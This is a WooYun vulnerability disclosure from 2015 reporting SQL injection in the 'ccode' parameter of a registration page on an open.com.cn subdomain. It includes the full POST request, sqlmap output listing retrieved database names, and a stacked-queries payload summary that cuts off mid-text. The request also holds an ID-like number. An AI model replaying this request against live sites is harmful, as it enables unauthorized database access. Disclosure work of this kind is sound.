当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0117287

漏洞标题:奥鹏教育某站SQL注射

相关厂商:open.com.cn

漏洞作者: 天地不仁 以万物为刍狗

提交时间:2015-05-31 12:08

修复时间:2015-07-16 10:58

公开时间:2015-07-16 10:58

漏洞类型:SQL注射漏洞

危害等级:低

自评Rank:1

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-31: 细节已通知厂商并且等待厂商处理中
2015-06-01: 厂商已经确认,细节仅向厂商公开
2015-06-11: 细节向核心白帽子及相关领域专家公开
2015-06-21: 细节向普通白帽子公开
2015-07-01: 细节向实习白帽子公开
2015-07-16: 细节向公众公开

简要描述:

【HD】 以团队之名 以个人之荣耀 共建网络安全(良心厂商 希望凭心给分)

详细说明:

POST /Register.aspx HTTP/1.1
Accept: */*
Cookie: ASP.NET_SessionId=3ir1jo45mbs1ey45splgvs45;
Referer: http://ets-ccaa.open.com.cn/Register.aspx
Accept-Language: zh-CN
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 3.0.4506.2152; .NET4.0C; .NET4.0E; BOIE9;ZHCN; UBrowser/5.0.595.32)
Content-Length: 8841
Host: ets-ccaa.open.com.cn
Pragma: no-cache
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTY5NjY2ODk2OA9kFgICAw9kFhYCGw8QD2QWAh4Ib25jaGFuZ2UFFlNlbGVjdFllYXJXaGVuTW9udGgyKCkPFpcBZgIBAgICAwIEAgUCBgIHAggCCQIKAgsCDAINAg4CDwIQAhECEgITAhQCFQIWAhcCGAIZAhoCGwIcAh0CHgIfAiACIQIiAiMCJAIlAiYCJwIoAikCKgIrAiwCLQIuAi8CMAIxAjICMwI0AjUCNgI3AjgCOQI6AjsCPAI9Aj4CPwJAAkECQgJDAkQCRQJGAkcCSAJJAkoCSwJMAk0CTgJPAlACUQJSAlMCVAJVAlYCVwJYAlkCWgJbAlwCXQJeAl8CYAJhAmICYwJkAmUCZgJnAmgCaQJqAmsCbAJtAm4CbwJwAnECcgJzAnQCdQJ2AncCeAJ5AnoCewJ8An0CfgJ%2FAoABAoEBAoIBAoMBAoQBAoUBAoYBAocBAogBAokBAooBAosBAowBAo0BAo4BAo8BApABApEBApIBApMBApQBApUBApYBFpcBEAUEMTkwMAUEMTkwMGcQBQQxOTAxBQQxOTAxZxAFBDE5MDIFBDE5MDJnEAUEMTkwMwUEMTkwM2cQBQQxOTA0BQQxOTA0ZxAFBDE5MDUFBDE5MDVnEAUEMTkwNgUEMTkwNmcQBQQxOTA3BQQxOTA3ZxAFBDE5MDgFBDE5MDhnEAUEMTkwOQUEMTkwOWcQBQQxOTEwBQQxOTEwZxAFBDE5MTEFBDE5MTFnEAUEMTkxMgUEMTkxMmcQBQQxOTEzBQQxOTEzZxAFBDE5MTQFBDE5MTRnEAUEMTkxNQUEMTkxNWcQBQQxOTE2BQQxOTE2ZxAFBDE5MTcFBDE5MTdnEAUEMTkxOAUEMTkxOGcQBQQxOTE5BQQxOTE5ZxAFBDE5MjAFBDE5MjBnEAUEMTkyMQUEMTkyMWcQBQQxOTIyBQQxOTIyZxAFBDE5MjMFBDE5MjNnEAUEMTkyNAUEMTkyNGcQBQQxOTI1BQQxOTI1ZxAFBDE5MjYFBDE5MjZnEAUEMTkyNwUEMTkyN2cQBQQxOTI4BQQxOTI4ZxAFBDE5MjkFBDE5MjlnEAUEMTkzMAUEMTkzMGcQBQQxOTMxBQQxOTMxZxAFBDE5MzIFBDE5MzJnEAUEMTkzMwUEMTkzM2cQBQQxOTM0BQQxOTM0ZxAFBDE5MzUFBDE5MzVnEAUEMTkzNgUEMTkzNmcQBQQxOTM3BQQxOTM3ZxAFBDE5MzgFBDE5MzhnEAUEMTkzOQUEMTkzOWcQBQQxOTQwBQQxOTQwZxAFBDE5NDEFBDE5NDFnEAUEMTk0MgUEMTk0MmcQBQQxOTQzBQQxOTQzZxAFBDE5NDQFBDE5NDRnEAUEMTk0NQUEMTk0NWcQBQQxOTQ2BQQxOTQ2ZxAFBDE5NDcFBDE5NDdnEAUEMTk0OAUEMTk0OGcQBQQxOTQ5BQQxOTQ5ZxAFBDE5NTAFBDE5NTBnEAUEMTk1MQUEMTk1MWcQBQQxOTUyBQQxOTUyZxAFBDE5NTMFBDE5NTNnEAUEMTk1NAUEMTk1NGcQBQQxOTU1BQQxOTU1ZxAFBDE5NTYFBDE5NTZnEAUEMTk1NwUEMTk1N2cQBQQxOTU4BQQxOTU4ZxAFBDE5NTkFBDE5NTlnEAUEMTk2MAUEMTk2MGcQBQQxOTYxBQQxOTYxZxAFBDE5NjIFBDE5NjJnEAUEMTk2MwUEMTk2M2cQBQQxOTY0BQQxOTY0ZxAFBDE5NjUFBDE5NjVnEAUEMTk2NgUEMTk2NmcQBQQxOTY3BQQxOTY3ZxAFBDE5NjgFBDE5NjhnEAUEMTk2OQUEMTk2OWcQBQQxOTcwBQQxOTcwZxAFBDE5NzEFBDE5NzFnEAUEMTk3MgUEMTk3MmcQBQQxOTczBQQxOTczZxAFBDE5NzQFBDE5NzRnEAUEMTk3NQUEMTk3NWcQBQQxOTc2BQQxOTc2ZxAFBDE5NzcFBDE5NzdnEAUEMTk3OAUEMTk3OGcQBQQxOTc5BQQxOTc5ZxAFBDE5ODAFBDE5ODBnEAUEMTk4MQUEMTk4MWcQBQQxOTgyBQQxOTgyZxAFBDE5ODMFBDE5ODNnEAUEMTk4NAUEMTk4NGcQBQQxOTg1BQQxOTg1ZxAFBDE5ODYFBDE5ODZnEAUEMTk4NwUEMTk4N2cQBQQxOTg4BQQxOTg4ZxAFBDE5ODkFBDE5ODlnEAUEMTk5MAUEMTk5MGcQBQQxOTkxBQQxOTkxZxAFBDE5OTIFBDE5OTJnEAUEMTk5MwUEMTk5M2cQBQQxOTk0BQQxOTk0ZxAFBDE5OTUFBDE5OTVnEAUEMTk5NgUEMTk5NmcQBQQxOTk3BQQxOTk3ZxAFBDE5OTgFBDE5OThnEAUEMTk5OQUEMTk5OWcQBQQyMDAwBQQyMDAwZxAFBDIwMDEFBDIwMDFnEAUEMjAwMgUEMjAwMmcQBQQyMDAzBQQyMDAzZxAFBDIwMDQFBDIwMDRnEAUEMjAwNQUEMjAwNWcQBQQyMDA2BQQyMDA2ZxAFBDIwMDcFBDIwMDdnEAUEMjAwOAUEMjAwOGcQBQQyMDA5BQQyMDA5ZxAFBDIwMTAFBDIwMTBnEAUEMjAxMQUEMjAxMWcQBQQyMDEyBQQyMDEyZxAFBDIwMTMFBDIwMTNnEAUEMjAxNAUEMjAxNGcQBQQyMDE1BQQyMDE1ZxAFBDIwMTYFBDIwMTZnEAUEMjAxNwUEMjAxN2cQBQQyMDE4BQQyMDE4ZxAFBDIwMTkFBDIwMTlnEAUEMjAyMAUEMjAyMGcQBQQyMDIxBQQyMDIxZxAFBDIwMjIFBDIwMjJnEAUEMjAyMwUEMjAyM2cQBQQyMDI0BQQyMDI0ZxAFBDIwMjUFBDIwMjVnEAUEMjAyNgUEMjAyNmcQBQQyMDI3BQQyMDI3ZxAFBDIwMjgFBDIwMjhnEAUEMjAyOQUEMjAyOWcQBQQyMDMwBQQyMDMwZxAFBDIwMzEFBDIwMzFnEAUEMjAzMgUEMjAzMmcQBQQyMDMzBQQyMDMzZxAFBDIwMzQFBDIwMzRnEAUEMjAzNQUEMjAzNWcQBQQyMDM2BQQyMDM2ZxAFBDIwMzcFBDIwMzdnEAUEMjAzOAUEMjAzOGcQBQQyMDM5BQQyMDM5ZxAFBDIwNDAFBDIwNDBnEAUEMjA0MQUEMjA0MWcQBQQyMDQyBQQyMDQyZxAFBDIwNDMFBDIwNDNnEAUEMjA0NAUEMjA0NGcQBQQyMDQ1BQQyMDQ1ZxAFBDIwNDYFBDIwNDZnEAUEMjA0NwUEMjA0N2cQBQQyMDQ4BQQyMDQ4ZxAFBDIwNDkFBDIwNDlnEAUEMjA1MAUEMjA1MGdkZAIdDxAPZBYCHwAFEEdldFNlbGVjdE1vbnRoKClkZGQCHw8QZA8WH2YCAQICAgMCBAIFAgYCBwIIAgkCCgILAgwCDQIOAg8CEAIRAhICEwIUAhUCFgIXAhgCGQIaAhsCHAIdAh4WHxAFAjAxBQIwMWcQBQIwMgUCMDJnEAUCMDMFAjAzZxAFAjA0BQIwNGcQBQIwNQUCMDVnEAUCMDYFAjA2ZxAFAjA3BQIwN2cQBQIwOAUCMDhnEAUCMDkFAjA5ZxAFAjEwBQIxMGcQBQIxMQUCMTFnEAUCMTIFAjEyZxAFAjEzBQIxM2cQBQIxNAUCMTRnEAUCMTUFAjE1ZxAFAjE2BQIxNmcQBQIxNwUCMTdnEAUCMTgFAjE4ZxAFAjE5BQIxOWcQBQIyMAUCMjBnEAUCMjEFAjIxZxAFAjIyBQIyMmcQBQIyMwUCMjNnEAUCMjQFAjI0ZxAFAjI1BQIyNWcQBQIyNgUCMjZnEAUCMjcFAjI3ZxAFAjI4BQIyOGcQBQIyOQUCMjlnEAUCMzAFAjMwZxAFAjMxBQIzMWdkZAIhDxAPFgIeC18hRGF0YUJvdW5kZ2QPFjlmAgECAgIDAgQCBQIGAgcCCAIJAgoCCwIMAg0CDgIPAhACEQISAhMCFAIVAhYCFwIYAhkCGgIbAhwCHQIeAh8CIAIhAiICIwIkAiUCJgInAigCKQIqAisCLAItAi4CLwIwAjECMgIzAjQCNQI2AjcCOBY5EAUG5rGJ5pePBQIwMWcQBQnokpnlj6Tml48FAjAyZxAFBuWbnuaXjwUCMDNnEAUG6JeP5pePBQIwNGcQBQznu7TlkL7lsJTml48FAjA1ZxAFBuiLl%2BaXjwUCMDZnEAUG5b2d5pePBQIwN2cQBQblo67ml48FAjA4ZxAFCeW4g%2BS%2BneaXjwUCMDlnEAUJ5pyd6bKc5pePBQIxMGcQBQbmu6Hml48FAjExZxAFBuS%2Bl%2BaXjwUCMTJnEAUG55G25pePBQIxM2cQBQbnmb3ml48FAjE0ZxAFCeWcn%2BWutuaXjwUCMTVnEAUJ5ZOI5bC85pePBQIxNmcQBQzlk4jokKjlhYvml48FAjE3ZxAFBuWCo%2BaXjwUCMThnEAUG6buO5pePBQIxOWcQBQnlgojlg7Pml48FAjIwZxAFBuS9pOaXjwUCMjFnEAUG55Wy5pePBQIyMmcQBQnpq5jlsbHml48FAjIzZxAFCeaLieelnOaXjwUCMjRnEAUG5rC05pePBQIyNWcQBQnkuJzkuaHml48FAjI2ZxAFCee6s%2Bilv%2BaXjwUCMjdnEAUJ5pmv6aKH5pePBQIyOGcQBQ%2Fmn6%2FlsJTlhYvlrZzml48FAjI5ZxAFBuWcn%2BaXjwUCMzBnEAUM6L6%2B5pah5bCU5pePBQIzMWcQBQnku6vkvazml48FAjMyZxAFBue%2BjOaXjwUCMzNnEAUJ5biD5pyX5pePBQIzNGcQBQnmkpLmi4nml48FAjM1ZxAFCeavm%2BmavuaXjwUCMzZnEAUJ5Luh5L2s5pePBQIzN2cQBQnplKHkvK%2Fml48FAjM4ZxAFCemYv%2BaYjOaXjwUCMzlnEAUJ5pmu57Gz5pePBQI0MGcQBQzloZTlkInlhYvml48FAjQxZxAFBuaAkuaXjwUCNDJnEAUP5LmM5YW55Yir5YWL5pePBQI0M2cQBQzkv4TnvZfmlq%2Fml48FAjQ0ZxAFDOmEgua4qeWFi%2BaXjwUCNDVnEAUJ5b635piC5pePBQI0NmcQBQnkv53lronml48FAjQ3ZxAFCeijleWbuuaXjwUCNDhnEAUG5Lqs5pePBQI0OWcQBQzloZTloZTlsJTml48FAjUwZxAFCeeLrOm%2BmeaXjwUCNTFnEAUM6YSC5Lym5pil5pePBQI1MmcQBQnotavlk7Lml48FAjUzZxAFCemXqOW3tOaXjwUCNTRnEAUJ54%2Be5be05pePBQI1NWcQBQnln7ror7rml48FAjU2ZxAFBuWFtuWugwUCOTlnZGQCJQ8QDxYCHwFnFgIfAAUOQ2hhbmdlX0N0eXBlKCkQFQUJ6Lqr5Lu96K%2BBCeWGm%2BWumOivgQbmiqTnhacY5riv44CB5r6z44CB5Y%2Bw6YCa6KGM6K%2BBBuWFtuS7lhUFAUEBQgFDAUQBRRQrAwVnZ2dnZ2RkAicPD2QWAh4Fc3R5bGUFMHBhZGRpbmctYm90dG9tOjJweDtwYWRkaW5nLXRvcDoycHg7ZGlzcGxheTpub25lO2QCKA8PZBYCHwIFMnBhZGRpbmctYm90dG9tOjJweDtwYWRkaW5nLXRvcDoycHg7ZGlzcGxheTppbmxpbmU7ZAJODxAPZBYCHgdvbmNsaWNrBRpDaGtJc05lZWRJbnZvaWNlX09uY2xpY2soKWRkZAJQDxAPZBYCHwMFEENoYW5nZV9JbnZvaWNlKClkZGQCXg8PZA8QFgFmFgEWAh4OUGFyYW1ldGVyVmFsdWVkFgECA2RkAmAPD2QPEBYBZhYBFgIfBGQWAQIDZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFEENoa0lzTmVlZEludm9pY2U9bc%2Brq%2FcI7XLtfV26v%2F%2BRuTYkFQ%3D%3D&UserName=wooyun&PassWord=123456&PassWord2=123456&TrueName=%E5%BC%A0%E4%B8%89&Sex=01&DropDownList1=1900&DropDownList2=01&DropDownList3=01&Nation=01&ctypecode=A&code=1&ccode=530126197811213822&Address=33333333333333333333332333&postcode=1000000&homephone=&mobilephone=&EMail=&Sel_Invoice=1&CertificationBody=&CertificateNumber=&CertificateRemarks=&Button1=%E7%A1%AE%E3%80%80%E5%AE%9A&__EVENTVALIDATION=%2FwEWlwIC7NHVsgQCr67qtggCssXgkQ8C7euahA0C4MWS5g4C%2F%2FiwrwMC%2F%2Fi0rwMC75fWwg8CtMrm4goCtMrayQ0CtMrOtAQCtMqikw8CtMqW%2FgcCtMqKpQ4CtMr%2BgQECtMrS7AkCtMqGhA8CtMr64AcC2fOIeALZ8%2FykCwLZ89CDAgLZ88TuCgLZ87jVDQLZ86ywBALZ84CfDwLZ8%2FT7BwLZ86iTBQLZ85z%2BDQLC5KrXDgLC5J6yAQLC5PKeCALC5OZFAsLk2qALAsLkzo8CAsLkouoKAsLkltENAsLkym4CwuS%2B1QsC543NogQC542hiQ8C542V9AcC542J0w4C5439vwEC543RmggC543FQQLnjbmsCwLnje3FDgLnjcGgAQKIt%2B%2B5AgKIt8PkCgKIt7fDDQKIt6uuBAKIt5%2BVDwKIt%2FPxBwKIt%2BfcDgKIt9u7AQKIt4%2FTBAKIt%2BO%2FDwKt2PGUCAKt2OVzAq3Y2d4LAq3YzYUCAq3YoeAKAq3Ylc8NAq3YiaoEAq3Y%2FZYPAq3Yka4CAq3YhZUFAtbBk%2BIHAtbBh8kOAtbB%2B7UBAtbB75AIAtbBw38C1sG32gsC1sGrgQIC1sGf7AoC1sGzhQgC1sGnYAL76rX5DQL76qmkBAL76p2DDwL76vHvBwL76uXKDgL76tmxAQL76s2cCAL76qF7Avvq1ZAGAvvqyf8OAsyA9bgEAsyA6ecMAsyA3cIHAsyAsakOAsyApZQBAsyAmfMJAsyAjV4CzIDhugsCzICV0g4CzICJuQEC8amXlgIC8amL%2FQoC8an%2F2Q0C8anThAQC8anH4wwC8am7zgcC8amvtQ4C8amDkAEC8am3qQQC8amrlA8CtcrC4goCtcq2yQ0CtcqqtAQCtcqekw8Ctcry%2FwcCtcrm2g4CtcragQECtcrO7AkCtcrihQ8CtcrW4AcC3vPkeQLe89ikCwLe88yDAgLe86DuCgLe85TVDQLe84iwBALe8%2FycDwLe89D7BwLe84STBQLe8%2Fj%2FDQLD5IbXDgLD5PqzAQLD5O6eCALD5MJFAsPktqALAsPkqo8CAsPknuoKAsPk8tYNAsPkpm4Cw%2BSa1QsC5I2pogQC5I2diQ8C5I3x9QcC5I3l0A4C5I3ZvwEC5I3NmggC5I2hQQLkjZWsCwLkjcnFDgLkjb2gAQKJt8u5AgKJt7%2FkCgKJt5PDDQKJt4euBAKJt%2FuKDwKJt%2B%2FxBwKJt8PcDgKJt7e7AQKJt%2BvQBAKJt9%2B%2FDwKy2O2UCAKOi%2BmIBgKOi%2B2IBgKOi9GIBgKOi9WIBgKOi9mIBgKOi92IBgKOi8GIBgKOi4WLBgKOi4mLBgKRi%2BWIBgKRi%2BmIBgKRi%2B2IBgKPi%2BmIBgKPi%2B2IBgKPi9GIBgKPi9WIBgKPi9mIBgKPi92IBgKPi8GIBgKPi4WLBgKPi4mLBgKQi%2BWIBgKQi%2BmIBgKQi%2B2IBgKQi9GIBgKQi9WIBgKQi9mIBgKQi92IBgKQi8GIBgKQi4WLBgKQi4mLBgKRi%2BWIBgKRi%2BmIBgKRi%2B2IBgKRi9GIBgKRi9WIBgKRi9mIBgKRi92IBgKRi8GIBgKRi4WLBgKRi4mLBgKSi%2BWIBgKSi%2BmIBgLfkOyDBALfkOiDBALfkNSDBALfkNCDBALfkNyDBALfkNiDBALfkMSDBALfkICABALfkIyABALAkOCDBALAkOyDBALAkOiDBALAkNSDBALAkNCDBALAkNyDBALAkNiDBALAkMSDBALAkICABALAkIyABALBkOCDBALBkOyDBALBkOiDBALBkNSDBALBkNCDBALBkNyDBALBkNiDBALBkMSDBALBkICABALBkIyABALCkOCDBALCkOyDBALCkOiDBALCkNSDBALCkNCDBALCkNyDBALCkNiDBALCkMSDBALCkICABALCkIyABALDkOCDBALDkOyDBALDkOiDBALDkNSDBALDkNCDBALDkNyDBALDkNiDBALDkMSDBALDkICABALDkIyABALEkOCDBALEkOyDBALEkOiDBALEkNSDBALEkNCDBALEkNyDBALEkNiDBALYkIyABALwma%2FgAQLxma%2FgAQLyma%2FgAQLzma%2FgAQL0ma%2FgAQKzmc2yBwLH%2FJboCALLodLgCAL02YLJCwKyzbarBQLn%2FNCJCQKS18akDQKV3vz2BAKWoNX1AwKXoNX1AwKXkJhuAufenLMMArTggvIPApDzhP8LAoznisYGXG134iWB2jIDpyvH2waGRx1EeqQ%3D


ccode 处 可注入

1.png


2.png


22个数据库

[09:25:43] [INFO] retrieved: 22
[09:27:07] [INFO] retrieved: AdventureWo
[09:43:19] [ERROR] invalid character detected. retrying..
[09:43:19] [WARNING] increasing time delay to 21 seconds
rks
[09:47:41] [INFO] retrieved: AdventureWorksDW
[10:10:06] [INFO] retrieved: BCM
[10:12:44] [INFO] retrieved: BCMExam
[10:20:27] [INFO] retrieved: BCMLog
[10:27:45] [INFO] retrieved: CCAA
[10:30:03] [INFO] retrieved: CCAA_GRADE
[10:38:34] [INFO] retrieved: CCAALog
[10:45:33] [INFO] retrieved: i_ex


时间注入 跑起来太慢了 就不跑了 反正只要证明即可 我又不脱你们库····

漏洞证明:

POST parameter 'ccode' is vulnerable. Do you want to keep testing the others (if
any)? [y/N] n
sqlmap identified the following injection points with a total of 95 HTTP(s) requ
ests:
---
Place: POST
Parameter: ccode
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTY5NjY2ODk2OA9
kFgICAw9kFhYCGw8QD2QWAh4Ib25jaGFuZ2UFFlNlbGVjdFllYXJXaGVuTW9udGgyKCkPFpcBZgIBAgI
CAwIEAgUCBgIHAggCCQIKAgsCDAINAg4CDwIQAhECEgITAhQCFQIWAhcCGAIZAhoCGwIcAh0CHgIfAiA
CIQIiAiMCJAIlAiYCJwIoAikCKgIrAiwCLQIuAi8CMAIxAjICMwI0AjUCNgI3AjgCOQI6AjsCPAI9Aj4
CPwJAAkECQgJDAkQCRQJGAkcCSAJJAkoCSwJMAk0CTgJPAlACUQJSAlMCVAJVAlYCVwJYAlkCWgJbAlw
CXQJeAl8CYAJhAmICYwJkAmUCZgJnAmgCaQJqAmsCbAJtAm4CbwJwAnECcgJzAnQCdQJ2AncCeAJ5Ano
CewJ8An0CfgJ/AoABAoEBAoIBAoMBAoQBAoUBAoYBAocBAogBAokBAooBAosBAowBAo0BAo4BAo8BApA
BApEBApIBApMBApQBApUBApYBFpcBEAUEMTkwMAUEMTkwMGcQBQQxOTAxBQQxOTAxZxAFBDE5MDIFBDE
5MDJnEAUEMTkwMwUEMTkwM2cQBQQxOTA0BQQxOTA0ZxAFBDE5MDUFBDE5MDVnEAUEMTkwNgUEMTkwNmc
QBQQxOTA3BQQxOTA3ZxAFBDE5MDgFBDE5MDhnEAUEMTkwOQUEMTkwOWcQBQQxOTEwBQQxOTEwZxAFBDE
5MTEFBDE5MTFnEAUEMTkxMgUEMTkxMmcQBQQxOTEzBQQxOTEzZxAFBDE5MTQFBDE5MTRnEAUEMTkxNQU
EMTkxNWcQBQQxOTE2BQQxOTE2ZxAFBDE5MTcFBDE5MTdnEAUEMTkxOAUEMTkxOGcQBQQxOTE5BQQxOTE
5ZxAFBDE5MjAFBDE5MjBnEAUEMTkyMQUEMTkyMWcQBQQxOTIyBQQxOTIyZxAFBDE5MjMFBDE5MjNnEAU
EMTkyNAUEMTkyNGcQBQQxOTI1BQQxOTI1ZxAFBDE5MjYFBDE5MjZnEAUEMTkyNwUEMTkyN2cQBQQxOTI
4BQQxOTI4ZxAFBDE5MjkFBDE5MjlnEAUEMTkzMAUEMTkzMGcQBQQxOTMxBQQxOTMxZxAFBDE5MzIFBDE
5MzJnEAUEMTkzMwUEMTkzM2cQBQQxOTM0BQQxOTM0ZxAFBDE5MzUFBDE5MzVnEAUEMTkzNgUEMTkzNmc
QBQQxOTM3BQQxOTM3ZxAFBDE5MzgFBDE5MzhnEAUEMTkzOQUEMTkzOWcQBQQxOTQwBQQxOTQwZxAFBDE
5NDEFBDE5NDFnEAUEMTk0MgUEMTk0MmcQBQQxOTQzBQQxOTQzZxAFBDE5NDQFBDE5NDRnEAUEMTk0NQU
EMTk0NWcQBQQxOTQ2BQQxOTQ2ZxAFBDE5NDcFBDE5NDdnEAUEMTk0OAUEMTk0OGcQBQQxOTQ5BQQxOTQ
5ZxAFBDE5NTAFBDE5NTBnEAUEMTk1MQUEMTk1MWcQBQQxOTUyBQQxOTUyZxAFBDE5NTMFBDE5NTNnEAU
EMTk1NAUEMTk1NGcQBQQxOTU1BQQxOTU1ZxAFBDE5NTYFBDE5NTZnEAUEMTk1NwUEMTk1N2cQBQQxOTU
4BQQxOTU4ZxAFBDE5NTkFBDE5NTlnEAUEMTk2MAUEMTk2MGcQBQQxOTYxBQQxOTYxZxAFBDE5NjIFBDE
5NjJnEAUEMTk2MwUEMTk2M2cQBQQxOTY0BQQxOTY0ZxAFBDE5NjUFBDE5NjVnEAUEMTk2NgUEMTk2Nmc
QBQQxOTY3BQQxOTY3ZxAFBDE5NjgFBDE5NjhnEAUEMTk2OQUEMTk2OWcQBQQxOTcwBQQxOTcwZxAFBDE
5NzEFBDE5NzFnEAUEMTk3MgUEMTk3MmcQBQQxOTczBQQxOTczZxAFBDE5NzQFBDE5NzRnEAUEMTk3NQU
EMTk3NWcQBQQxOTc2BQQxOTc2ZxAFBDE5NzcFBDE5NzdnEAUEMTk3OAUEMTk3OGcQBQQxOTc5BQQxOTc
5ZxAFBDE5ODAFBDE5ODBnEAUEMTk4MQUEMTk4MWcQBQQxOTgyBQQxOTgyZxAFBDE5ODMFBDE5ODNnEAU
EMTk4NAUEMTk4NGcQBQQxOTg1BQQxOTg1ZxAFBDE5ODYFBDE5ODZnEAUEMTk4NwUEMTk4N2cQBQQxOTg
4BQQxOTg4ZxAFBDE5ODkFBDE5ODlnEAUEMTk5MAUEMTk5MGcQBQQxOTkxBQQxOTkxZxAFBDE5OTIFBDE
5OTJnEAUEMTk5MwUEMTk5M2cQBQQxOTk0BQQxOTk0ZxAFBDE5OTUFBDE5OTVnEAUEMTk5NgUEMTk5Nmc
QBQQxOTk3BQQxOTk3ZxAFBDE5OTgFBDE5OThnEAUEMTk5OQUEMTk5OWcQBQQyMDAwBQQyMDAwZxAFBDI
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
